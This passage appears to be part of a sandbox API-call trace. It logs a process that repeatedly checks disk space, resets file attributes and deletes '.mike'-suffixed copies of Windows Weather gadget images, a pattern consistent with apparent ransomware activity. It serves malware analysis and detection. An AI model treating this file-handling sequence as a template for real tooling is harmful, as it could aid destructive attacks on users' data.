lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png", dwFileAttributes=0x80) returned 0 [0105.742] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png.mike")) returned 1 [0105.744] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png", dwFileAttributes=0x80) returned 0 [0105.750] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png.mike")) returned 1 [0105.752] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png", dwFileAttributes=0x80) returned 0 [0105.757] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png.mike")) returned 1 [0105.759] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png", dwFileAttributes=0x80) returned 0 [0105.764] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png.mike")) returned 1 [0105.766] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png", dwFileAttributes=0x80) returned 0 [0105.771] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png.mike")) returned 1 [0105.773] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png", dwFileAttributes=0x80) returned 0 [0105.778] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png.mike")) returned 1 [0105.779] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png", dwFileAttributes=0x80) returned 0 [0105.784] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png.mike")) returned 1 [0105.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png", dwFileAttributes=0x80) returned 0 [0105.791] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png.mike")) returned 1 [0105.793] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png", dwFileAttributes=0x80) returned 0 [0105.797] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png.mike")) returned 1 [0105.799] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png", dwFileAttributes=0x80) returned 0 [0105.804] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png.mike")) returned 1 [0105.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png", dwFileAttributes=0x80) returned 0 [0105.811] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png.mike")) returned 1 [0105.812] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png", dwFileAttributes=0x80) returned 0 [0105.817] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png.mike")) returned 1 [0105.819] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.824] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png", dwFileAttributes=0x80) returned 0 [0105.824] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png.mike")) returned 1 [0105.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png", dwFileAttributes=0x80) returned 0 [0105.831] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png.mike")) returned 1 [0105.832] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png", dwFileAttributes=0x80) returned 0 [0105.839] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png.mike")) returned 1 [0105.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png", dwFileAttributes=0x80) returned 0 [0105.845] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png.mike")) returned 1 [0105.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png", dwFileAttributes=0x80) returned 0 [0105.851] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png.mike")) returned 1 [0105.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png", dwFileAttributes=0x80) returned 0 [0105.859] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png.mike")) returned 1 [0105.860] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png", dwFileAttributes=0x80) returned 0 [0105.865] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png.mike")) returned 1 [0105.867] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png", dwFileAttributes=0x80) returned 0 [0105.872] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png.mike")) returned 1 [0105.874] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png", dwFileAttributes=0x80) returned 0 [0105.879] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png.mike")) returned 1 [0105.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png", dwFileAttributes=0x80) returned 0 [0105.885] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png.mike")) returned 1 [0105.887] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png", dwFileAttributes=0x80) returned 0 [0105.892] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png.mike")) returned 1 [0105.894] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png", dwFileAttributes=0x80) returned 0 [0105.899] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png.mike")) returned 1 [0105.900] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png", dwFileAttributes=0x80) returned 0 [0105.905] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png.mike")) returned 1 [0105.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png", dwFileAttributes=0x80) returned 0 [0105.912] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png.mike")) returned 1 [0105.913] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png", dwFileAttributes=0x80) returned 0 [0105.920] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png.mike")) returned 1 [0105.922] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png", dwFileAttributes=0x80) returned 0 [0105.934] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png.mike")) returned 1 [0105.936] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png", dwFileAttributes=0x80) returned 0 [0105.945] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png.mike")) returned 1 [0105.946] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.950] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png", dwFileAttributes=0x80) returned 0 [0105.951] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png.mike")) returned 1 [0105.952] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png", dwFileAttributes=0x80) returned 0 [0105.957] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png.mike")) returned 1 [0105.959] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png", dwFileAttributes=0x80) returned 0 [0105.964] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\5.png.mike")) returned 1 [0105.966] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png", dwFileAttributes=0x80) returned 0 [0105.971] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png.mike")) returned 1 [0105.972] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png", dwFileAttributes=0x80) returned 0 [0105.977] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\7.png.mike")) returned 1 [0105.979] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png", dwFileAttributes=0x80) returned 0 [0105.986] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png.mike")) returned 1 [0105.988] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0105.993] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png", dwFileAttributes=0x80) returned 0 [0105.993] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\9.png.mike")) returned 1 [0105.994] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png", dwFileAttributes=0x80) returned 0 [0106.000] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\activity16v.png.mike")) returned 1 [0106.002] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png", dwFileAttributes=0x80) returned 0 [0106.006] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png.mike")) returned 1 [0106.009] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png", dwFileAttributes=0x80) returned 0 [0106.014] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png.mike")) returned 1 [0106.016] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, 